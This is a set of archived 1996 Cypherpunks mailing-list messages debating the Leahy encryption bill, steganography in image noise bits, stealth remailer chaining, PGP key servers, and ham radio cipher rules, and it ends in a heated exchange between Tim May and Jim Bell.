					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 11 Mar 1996 17:50:31 +0800
To: jimbell@pacifier.com
Subject: Re: Leahy's guillotine.
Message-ID: <01I26QG1VLNCAKTUBC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jimbell@pacifier.com"  "jim bell"  9-MAR-1996 21:27:52.24

>Further, any organization with even a shred of credibility that does not 
>condition its support for this bill on the complete removal of this section 
>is doing the rest of us an extreme disservice:  It is trading on and risking
>its reputation, because many of them are issuing opinions of this section of
>the bill with assurances that it will only be used against "guilty" people,
>when there is simply no way to know if this is going to be true.

	Either complete removal _or_ replacement with something clearly stating
the preferable interpretation (only for cryptography knowingly used by a person
committing a felony to conceal the commission of that felony). The latter,
while not as good as the former (why should there be additional charges for
using cryptography for concealment of a felony?), is acceptable with the other
portions of the bill counterweighing it.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 12 Mar 1996 04:00:19 +0800
To: adam@lighthouse.homeport.org
Subject: Re: Cryptanalysis
Message-ID: <01I26QNY0Q3MAKTUBC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: Adam Shostack <adam@homeport.org>

>From: TCMay:
>| cryptanalysis. (Not to sound harsh to Allen, but why would anyone ask here
>| on the list for recommendations to such a standard subject when Schneier,
>| Garfinkel, Denning, etc. all have books listed?)

>	Niether Schneier nor Garfinkel really talk about analysis.
>The only book I can think of is Biham's "Cryptanalysis of the DES,"
>and thats on a single technique.

	I wasn't asking about cryptanalysis; I was asking about codes (as
opposed to cyphers).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Tue, 12 Mar 1996 15:51:47 +0800
To: sasha1@netcom.com
Subject: Re: Stego - images and sounds
Message-ID: <01I26QS0WD1KAKTUBC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"sasha1@netcom.com"  "Alexander 'Sasha' Chislenko"  9-MAR-1996 22:59:54.01

>At 12:19 PM 3/8/96 -0800, Jim McCoy <mccoy@communities.com> wrote:
>>
>>Provided the bits are random in the way that they should be... The low-order
>>bits in such files were chosen by implementors of stego programs because
>>modification would not be noticed by the person viewing or listening to
>>the file, not necessarily because there was actually randomness at this
>>level which could be replaced.  Does anyone know of a survey of images or
>>sound files which tested the statistical randomness of these bits?  They
>>may not be as random as people think they are.
>>

> This should depend on how the image/sound was obtained, though I am pretty
>sure in most cases there would be easily detectable patterns.  They would
>be the strongest in software-generated files, smaller in good reproductions
>of precise recordings, and very small in noisy recordings.  In all cases,
>the number of lower bits used for stego-messages may be chosen lower than
>the existing noise of the signal.  Changing all lower bits in a good
>rendered image may still be unnoticeable for the human viewer, but really
>easy to detect to a program.

	Unless the picture, sound, whatever has a periodic function, the LSB
ought to have an approximately random distribution (barring all 0's and all
1's, for full color saturation). The periodic function part could be a problem.
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Mon, 11 Mar 1996 05:03:55 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: PGP 3.0/4.0
In-Reply-To: <199603061501.KAA16783@homeport.org>
Message-ID: <E0tvs5C-0007Dk-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>| How about code that goes out & fetches keys upon demand, al-la DNS?

That's what the next generation of Distributed Key Server stuff will do.

> This works with procmail to get keys for all mail I receive.

As you say, fetching keys for all keys you ever receive will cause your
keyring to become excessive ...

I prefer to be able to fetch a key in real time when I want to send to it.
As such, I wrote a reasonably defined command such that "if the exit code is
0, then stdout is the armoured key for the KeyID or UserID specified on the
command line".  In future, it'll use the new Distributed Key Server, but until
then, it uses a "fast" server (a perl daemon which loads the whole keyring into
a DBM backed ASSOC array) or WWW servers.
[ Former takes about 500mS locally, but as Sprint appear only to have been
  making one attempt per week to get the greatly overdue Fat Pipe upgrade going
  it'll be somewhat more for anyone outside the UK :-((
]
See http://www.pgp.net/pgpnet/#krem if you're interested ...


[ Any offers to provide pgp.net services are likley to be greatfully accepted ]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 11 Mar 1996 15:02:23 +0800
To: wb8foz@nrk.com
Subject: Re: How would Leahy bill affect crypto over HAM radio?
Message-ID: <199603110505.VAA03962@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:26 PM 3/10/96 -0500, you wrote:
>> 
>> Subject asks it. I'm not a HAM, but still curious. Wonder if anyone
>> has brought this to Leahy's attention...
>> 
>> Comments from the packet folx on the list?
>
>Non-cleartext has been forbidden for last 60 years anyhow.

Yes, but the law _might_ have the side-effect of changing that.
It'd be real pleasant if it does...  I suspect the best way to make
that happen would be to say "shhhh" any time anyone proposes 
mentioning the topic to a politician....
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 12 Mar 1996 09:32:13 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [NOISE] Re: Do you feel lucky, punk?
Message-ID: <199603110505.VAA03975@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>In fact, I would argue that a remailer operator will actually be considered 
>MORE responsible, legally, than Mrs. Bennis:  

On the contrary, the government would have far _less_ ability to forfeit
the property of a remailer-operator for the activities of a non-owning abuser
than they do to seize Mrs. Bennis's car, because the misuser, Mr. Bennis,
was also its owner.

On the other hand, I'd say that a remailer used for assassination politics
is _far_ more likely to be seized, warranted, subpoenaed, and otherwise harassed
that one merely used for unencrypted dirty pictures or encrypted dirty money....
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 11 Mar 1996 11:42:14 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Cut the mystical artist crap. (No crypto relevance here)
In-Reply-To: <199603110110.CAA05830@utopia.hacktic.nl>
Message-ID: <Pine.BSF.3.91.960310211211.715B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Mar 1996, Anonymous wrote:
>... 
> Was it Thoreau who said "Consistency is the hobgoblin of
> simpletons"?

Thoeau said that "a foolish consistentcy is the hobgoblin of little minds 
..."                ^^^^^^^   


EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 11 Mar 1996 19:21:36 +0800
To: Alan Horowitz <alanh@larry.infi.net>
Subject: Re: Cryptanalysis
Message-ID: <199603110518.VAA13194@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:45 PM 3/10/96 -0500, you wrote:
>IS there anyone outside of governments, doing code-breaking _for a living_?

Don't know if it's a full-time income or not, but there are certainly
several people offering commercial products for cracking Microsoft
and other popular word processor encryption for people who've lost
their passwords.  And people who are designing good cryptosystems
to protect information have to understand how to crack them, so they
can tell whether their new system is stronger or weaker.
But there's usually not much other legitimate need for cracking
real messages; the authorized people usually have the keys.

Whether there are also Bad Guys doing the job for profit,
I don't know.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Mon, 11 Mar 1996 12:07:40 +0800
To: wlkngowl@unix.asb.com (Mutant Rob)
Subject: Re: How would Leahy bill affect crypto over HAM radio?
In-Reply-To: <31437F04.EF1@unix.asb.com>
Message-ID: <199603110226.VAA00697@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Subject asks it. I'm not a HAM, but still curious. Wonder if anyone
> has brought this to Leahy's attention...
> 
> Comments from the packet folx on the list?

Non-cleartext has been forbidden for last 60 years anyhow.



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Mon, 11 Mar 1996 11:19:49 +0800
To: cypherpunks@toad.com
Subject: Re: Cut the mystical artist crap. (No crypto relevance here)
Message-ID: <v02120d01ad693f094399@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 2:10 AM 3/11/96, Anonymous wrote:

>Was it Thoreau who said "Consistency is the hobgoblin of
>simpletons"?

        No, it was Emerson. And that's not what he said.

>What the compromises have to do with are that one lives in
>a society with rules, mores, laws.  One of those touch-shit
>facts of life.  You can do what you want, but when it involves

        You seem to be rather fond of consistency. ;)

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 11 Mar 1996 11:31:48 +0800
To: PADGETT@hobbes.orl.mmc.com
Subject: Re: Lawz to be.
Message-ID: <01I26SR4VEMOAKTUL8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"PADGETT@hobbes.orl.mmc.com"  "A. Padgett Peterson P.E. Information Security" 10-MAR-1996 01:15:57.84

>Thought the gotcha was down in the part about the Secretary of Commerce. 
>My reading is that the secretary will still be required to grant
>approval for commercial export. Is past the part about no regulation
>inside the US (which is true now - still would be nice to see a "Congress
>shall make no law..."). The puzzler is the requirement that a comperable 
>foreign product must exist before permission to export will be granted.

>Will this be like "comparable product" price matching in discount houses ?
>Somehow there never is one...

	Quite. A better format would be "as hard or harder for the NSA to
decrypt," given the publically stated purpose for ITAR.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 11 Mar 1996 12:11:44 +0800
To: tcmay@got.net
Subject: Re: Not a good idea...
Message-ID: <01I26T3JWQ7AAKTUL8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: tcmay@got.net (Timothy C. May)

>We need to be very careful here. A service like "SurfWatch," voluntarily
>used by others, has entered into no contracts with sites to meet defined
>standards of what should and shouldn't be blocked. It is essentially a
>"review" service, like a reviewer of books, movies, restaurants, etc. Sure,
>some books, movies, and restaurants are "hurt" by negative reviews, but
>this is life in a free society. It has not yet reached the point in these
>Beknighted States that a bad review can be the basis of a tort (though I
>could be wrong...nothing would surprise me these days).

	One wonders if an ISP (say, Prodigy or AOL) that used SurfWatch to
automatically filter everything could be liable if they filtered something
that wasn't against their policies (due to overly accepting SurfWatch's or
TimWatch's ratings) - non-provision of service? I'd guess they have some
clause or another in their normal contract w/users to try to prevent such, but
framing it so as to cover such without also basically making it a non-contract
(no agreement to provide anything) could be difficult.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 12 Mar 1996 09:27:17 +0800
To: stewarts@ix.netcom.com
Subject: Re: Vexatious Litigants  (was: SurfWatch)
Message-ID: <01I26T701LU4AKTUL8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart" 10-MAR-1996 04:29:37.67

>Presumably, almost nobody in Europe is going to add these silly Yankee
>rating labels to their web pages, except a few commercial content providers
>who want to sell advertising or services into markets that block
>un-rated web pages.  So schoolkids behind rating-mandatory sites
>will have to ask their teachers why the "World-Wide-Web" is just American ---
>"It's got All 50 States, Johnny!"   <Exonive deleted>!

	The WWW consortium is approaching European governments about their
rating system - the one found at SafeSurf.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 11 Mar 1996 12:01:43 +0800
To: tallpaul@pipeline.com
Subject: Re: No Subject
Message-ID: <01I26TJVXRGMAKTUL8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tallpaul@pipeline.com" 10-MAR-1996 15:48:49.98

>In other words, this or that person acts as a (perhaps temporary) remailer
>from their regular account, gets the material encrypted, and massages it in
>various ways before sending it out. The point is to increase entropy by
>creating the technological base for an enormous proliferation of
>remailer/anon tech at the lowest possible price. 
 
>Internationally know "elite" (in the good sense of the word) remailers are
>by definition known, and thus easy to monitor. Mixmaster etc sites popping
>up from the home computers in the rec rooms of suburbia are not. 
 
	I have been considering the problem of making sure that these non-elite
remailers are actually used by enough people to defeat traffic analysis,
be useful, et al. Just posting the location & key in a public place is good,
but leads to the possibility of somebody cracking down (especially if it's in
someplace like Singapore). The alternatives are:
	A. Send out the address in some form of reply block, along with the
key. If someone wants to use the remailer, they include the reply block at the
appropriate stage. Thus, the remailer decoding the reply block (probably an
"elite" remailer) will know the address, but none others will.
	B. Send it to one remailer with a setup such that it will encrypt some
percentage of messages coming through it with the key of the "stealthed"
remailer and mail them to that remailer. Again, whoever operates that remailer
will (if they look) know the location. This can also add length to chains even
when others don't know the stealth remailer exists.
	C. Send it to one of the web-page or other automatic chaining
facilities with their automatically using it in some percentage of the cases.
Again, this trusts the maintainers of the chaining facility.

	In all of these cases, one would not want the stealth remailer to be
the last one in the chain. But such remailers can still help make things more
difficult for an attacker.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Mon, 11 Mar 1996 19:19:01 +0800
To: Louis Freeh <cypherpunks@toad.com>
Subject: Re: ADL_mil (militias and the USAF)
In-Reply-To: <Pine.SV4.3.91.960310224903.11783D-100000@larry.infi.net>
Message-ID: <MailDrop1.1.960310221307@pax-ca4-22.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Mar 1996 22:54:58 -0500 (EST) alanh@larry.infi.net (Alan Horowitz) 
wrote:

>Well, yes.
>
>However...
>
>The strongman of ADL, Abe Foxman  has a salary in six figures. People in
>the organization are doing good business on the "militia" scare.

This is true. Someone posted a general indictment of the pressure-group 
mentality a few days ago. I agree with most of what the ADL does, but I don't 
like it when *anyone* "exaggerates" like that. I've criticized the ADL, and
I've criticized the Nazis and black-helicopter wackos who also lie and 
"exaggerate" to get financial and moral support.

As Declan found out, I tend to be harshest on friends, because I consider
them most worth saving. I've never aspired to be anything but an independent 
loudmouth, and a FUCKING STATIST, of course.

-rich
 Institute for Ernst Zundel Revisionism
 http://www.c2.org/~rich/Press/Swedish/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Mon, 11 Mar 1996 19:24:59 +0800
To: jamesd@echeque.com
Subject: Re: Petty Civil Disobedience
In-Reply-To: <199603110412.UAA13449@dns1.noc.best.net>
Message-ID: <Pine.3.89.9603102245.A13892-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Mar 1996 jamesd@echeque.com wrote:

> The point is that they do a lousy job on dithering.  So does Microsoft
> explorer.  They probably purchased the identical code from some clot.

Some *rich* clod, you mean... :(
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@larry.infi.net>
Date: Tue, 12 Mar 1996 15:56:06 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Cryptanalysis
In-Reply-To: <ad67d50e0d0210040718@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960310224437.11783A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


IS there anyone outside of governments, doing code-breaking _for a living_?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Tue, 12 Mar 1996 15:49:22 +0800
To: Al Tirevold <tirevold@mindspring.com>
Subject: Re: How would Leahy bill affect crypto over HAM radio?
Message-ID: <199603110352.WAA24293@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


> It is illegal for amateur radio operators to use codes and ciphers per part
> 97.117 of the FCC rules.  Therefore, the Leahy bill would have no impact on
> "ham" radio.

But doesn't the bill grant the right to use encryption? That's my 
point... the Internet and even international phone calls render that 
rule meaningless, since there are other (easier?) ways to communicate 
internationally using ciphers.

Leahy's bill doesn't restrict what media encryption may be used on.

I am aware that (as of now) crypto is banned on HAM, but my question 
is whether one can consider the Leahy bill to lift that ban. (It 
might also be useful for HAMs to get an amendment of some sort to the 
bill...)


 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Tue, 12 Mar 1996 09:25:41 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Cut the mystical artist crap. (No crypto relevance here)
In-Reply-To: <199603110110.CAA05830@utopia.hacktic.nl>
Message-ID: <Pine.OSF.3.91.960310224907.10521A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 11 Mar 1996, Anonymous wrote:

> Was it Thoreau who said "Consistency is the hobgoblin of
> simpletons"?

Wasn't it Emmerson who said "A foolish consistancy is the hobgoblin of 
small minds"?

Pedantically yours <G>

Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@larry.infi.net>
Date: Tue, 12 Mar 1996 09:21:44 +0800
To: Just Rich <rich@c2.org>
Subject: Re: ADL_mil (militias and the USAF)
In-Reply-To: <Pine.SUN.3.91.960310154752.8213C-100000@infinity.c2.org>
Message-ID: <Pine.SV4.3.91.960310224903.11783D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Well, yes.

However...

The strongman of ADL, Abe Foxman  has a salary in six figures. People in the 
organization are doing good business on the "militia" scare.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 11 Mar 1996 13:59:43 +0800
To: cypherpunks@toad.com
Subject: Leahy Bill a Move to Slow Crypto Exports as Much as Possible
Message-ID: <ad68e730150210046ef9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:42 AM 3/11/96, E. ALLEN SMITH wrote:
>From:   IN%"PADGETT@hobbes.orl.mmc.com"  "A. Padgett Peterson P.E.
>Information Security" 10-MAR-1996 01:15:57.84
>
>>Thought the gotcha was down in the part about the Secretary of Commerce.
>>My reading is that the secretary will still be required to grant
>>approval for commercial export. Is past the part about no regulation
>>inside the US (which is true now - still would be nice to see a "Congress
>>shall make no law..."). The puzzler is the requirement that a comperable
>>foreign product must exist before permission to export will be granted.
>
>>Will this be like "comparable product" price matching in discount houses ?
>>Somehow there never is one...
>
>        Quite. A better format would be "as hard or harder for the NSA to
>decrypt," given the publically stated purpose for ITAR.

I think this is showing that one of the intended purposes of the Leahy bill
is to slow down exports of crypto for as long as possible, and then only to
grant export licenses when competition from abroad threatens to undo the
effects of the stalling process anyway.

The clause reads to me as: "We'll delay approval for export of your
software for as long as possible, and only grant approval when you face
serious competition from abroad, by which time we'll have accomplished our
goals anyway."

It seems that the SPA estimates of $60B are being responded to, that the
Leahy bill addresses the potential competitive losses to other products
only. (And of course the $60B, though probably inflated, includes more than
just lost sales because a vendor can't ship with strong encryption.)

The effect of the clause is to make truly novel new applications--including
many of the things that interest us--stallable for an indefinite period.
Then, when the Italian or Taiwanese version appears, if ever, the export
license will have to be granted.

If this is a correct reading of the indended use, then this is another
reason not to cheer about the Leahy bill. It would _not_ make crypto freely
exportable. But by claiming it has loosened up crypto exports (which it
will for certain corporate products), it will have taken the wind out of
the sails of those who wanted relaxed exports. Those who can buy lobbyists
and who are competing in fairly "standardized" niches, where competitors
exist, will probably be able to get export licenses. Those in
quasi-underground niches, trying to sell things that have not been built
before, will likely face a stone wall.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Mar 1996 15:45:25 +0800
To: t byfield <tbyfield@panix.com>
Subject: Re: Cut the mystical artist crap. (No crypto relevance here)
In-Reply-To: <v02120d01ad693f094399@DialupEudora>
Message-ID: <Pine.BSF.3.91.960310231642.3946A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Mar 1996, t byfield wrote:

> At 2:10 AM 3/11/96, Anonymous wrote:
> 
> >Was it Thoreau who said "Consistency is the hobgoblin of
> >simpletons"?
> 
>         No, it was Emerson. And that's not what he said.
> 
> >What the compromises have to do with are that one lives in
> >a society with rules, mores, laws.  One of those touch-shit
> >facts of life.  You can do what you want, but when it involves
> 
>         You seem to be rather fond of consistency. ;)
> 
> Ted
> 

You are, of course, correct that it was Emerson, my half correct respone
to Anonymous.

The quotation continues ... "With consistency a great soul has simply 
nothing to do."

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 11 Mar 1996 18:07:34 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: [NOISE] Re: Do you feel lucky, punk?
Message-ID: <m0tw1vy-0008yDC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:05 PM 3/10/96 -0800, Bill Stewart wrote:
>>In fact, I would argue that a remailer operator will actually be considered 
>>MORE responsible, legally, than Mrs. Bennis:  
>
>On the contrary, the government would have far _less_ ability to forfeit
>the property of a remailer-operator for the activities of a non-owning abuser
>than they do to seize Mrs. Bennis's car, because the misuser, Mr. Bennis,
>was also its owner.

Your logic is faulty.  The issue is not whether Mr. Bennis' interest in the 
car could be taken; the issue is whether _Mrs._ Bennis' interest can.  The 
"reasoning" given by Rehnquist (which I quoted; you ignored the quote) 
clearly indicates that he thinks Mrs. Bennis should lose her interest as 
well.  Go back and re-visit the issue.  

As for the comparison of the levels of "guilt" of Mrs. Bennis and the 
hypothetical encrypted anonymous remailer, generally the law tends to claim 
to punish people for things they can do something about; it is somewhat 
pointless to punish a person for something he (or she) has no control over.  
Mrs. Bennis can not be reasonably expected to be able to stop her husband 
from using the car; thus she can't be expected to stop him from ABUSING it, 
either.  Despite this, Rehnquist tries to punish her.  Clearly, he feels 
that anyone who is at the level of control of Mrs Bennis (or, presumably, 
greater) is responsible for such abuse.  (Four justices disagreed, however.)

An anonymous remailer, on the other hand, does not have to exist:  The 
operator could simply shut it down.  The remailer operator, therefore, is 
ABSOLUTELY in control of the behavior of his system:  He chooses to run it; 
he chooses the software; he chooses to keep records or to not keep records.  
All these things are within his control. If that system forwards a piece of 
email, it does so only because the operator allowed it to.   Thus, from "the 
Rehnquist perspective," the anonymous remailer operator is ABSOLUTELY 
responsible for the abuse of his system.  You may disagree, of course, but 
you aren't the sleaze on the Supreme Court who is going to make the decision.  

There is, therefore, no reason to believe that the Supreme Court will treat 
the anonymous encrypted remailer operator any BETTER than Mrs. Bennis, and 
in fact they will likely try to treat him worse.  How could you ever have 
believed otherwise?  

>On the other hand, I'd say that a remailer used for assassination politics
>is _far_ more likely to be seized, warranted, subpoenaed, and otherwise
harassed
>that one merely used for unencrypted dirty pictures or encrypted dirty 
money....

Which, of course, is one of the prime reasons this section is in the bill.  
You know it and I know it.  The Feds are running scared.

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 12 Mar 1996 09:34:52 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: Bell, Detweiler, Ravings, and Whatnot
Message-ID: <ad69062516021004b4c4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:37 AM 3/11/96, jim bell wrote:

>Well, until about  3/4 of a year ago, I spent no time on Internet except
>through a FIDO gateway on Libernet and Libernet-d, so I missed all that.
>I'm a
>bit ashamed to admit that I haven't read the vast majority of Cybernomicon,
>although somebody was nice enough to email me a section on the  subject of
>anonymous assassination markets.  I wondered why you hadn't extended the
>idea to a more general system, but then again that was a bit early if you
>talked about it in 1988.  Without the invention of digital cash, it's a bit
>hard to reward the assassin.

Oh, but you are missing the main point completely. It was reading Chaum's
1985 paper on digital cash that got me thinking about this. By 1988-90,
digital cash was essentially in the same state it is in now. Central to my
points was an anonymous two-way market, such as the BlackNet market I
developed in '93.


>>And your insulting comments about people whom you disagree with, or people
>>whom you think are not taking your ideas seriously enough, are reminiscent
>>of the ravings of the last victim here of late stage Detweiler's Syndrome.
>>--Tim May
>
>Well, maybe at times I do get a bit testy, but most recently on this Leahy
>bill I'm disgusted to see organizations that SHOULD be sounding the alarm
>actually express only mildly guarded support for that bill, "wart and all."
>I'd love to see _most_ of the bill pass, but the one bad section is a real
>killer.

There are many things I find terrible, disgusting, dangerous, wrong, etc.
But I have never been persuaded by people ranting at me and insulting me,
so I doubt that rants and insults from me will be effective. (I'm not
claiming to always be calm and non-insulting, just claiming that the style
of ranting is rarely effective, and I try to avoid it.)

Screaming insults at people, resorting to ad hominem attacks on their
personality (such as Jim did with Padgett Peterson), ranting about how
people are fools and worse, and generally foaming at the mouth...these are
behaviors which cause people to be dismissed as jerks, paranoids, and
killfile occuppants.

Read the archives covering the several months when Detweiler (aka V. Z.
Nuri, aka S. Boxx, aka Pablo Escobar, aka about 20 other pseudonyms) was
foaming at the mouth about how people were mutating his brain, how the
crypto anarchists were ignoring him, how the snakes of Medusa were hiding
in his keyboard, and so on. Then note the similarities to Jim Bell.

I have nothing against you, Jim Bell, but you are coming across as a loon,
as someone who clearly needs some kind of anti-psychotic medication. You
rant, you quote excessively, you dissect short comments with pages-long
diatribes, you ascribe motivations to your opponents that you cannot
possibly be privy to, and you generally act like a fool. I urge you to
moderate your debating style before you're just dismissed completely as a
detweiling basket case.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 12 Mar 1996 04:26:27 +0800
To: cypherpunks@toad.com
Subject: Re: Bell, Detweiler, Ravings, and Whatnot
Message-ID: <m0tw2is-0008ybC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:58 PM 3/10/96 -0800, Timothy C. May wrote:

>There are many things I find terrible, disgusting, dangerous, wrong, etc.
>But I have never been persuaded by people ranting at me and insulting me,
>so I doubt that rants and insults from me will be effective. (I'm not
